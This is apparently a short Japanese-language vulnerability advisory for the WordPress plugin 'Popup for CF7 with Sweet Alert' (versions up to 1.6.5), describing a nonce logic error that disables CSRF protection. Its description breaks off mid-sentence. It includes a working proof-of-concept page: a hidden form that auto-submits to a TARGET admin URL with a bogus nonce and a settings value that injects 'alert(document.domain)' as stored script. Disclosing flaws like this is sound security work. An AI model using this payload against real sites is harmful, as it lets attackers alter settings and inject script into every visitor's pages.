
Popup for CF7 with Sweet Alert <= 1.6.5 - クロスサイトリクエストフォージェリ
Popup for CF7 with Sweet Alert <= 1.6.5 - クロスサイトリクエストフォージェリ
https://wordpress.org/plugins/cf7-sweet-alert-popup/
このプラグインの設定ハンドラには、nonce 検証における論理エラーがあり、すべての CSRF 保護が無効化されています。 未認証の攻撃者は、認証済みの管理者を、自動送信フォームを隠し持つ悪意のあるページにアクセスさせることでこれを悪用し、プラグイン設定を任意に変更できます。 送信された値はサニタイズされずに保存され、wp_head を介してすべてのフロントエンドページの
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>
<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
method="POST" id="csrf" target="hiddenframe">
<input name="cf7simplePopupWidth" value="500;alert(document.domain)">
<input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>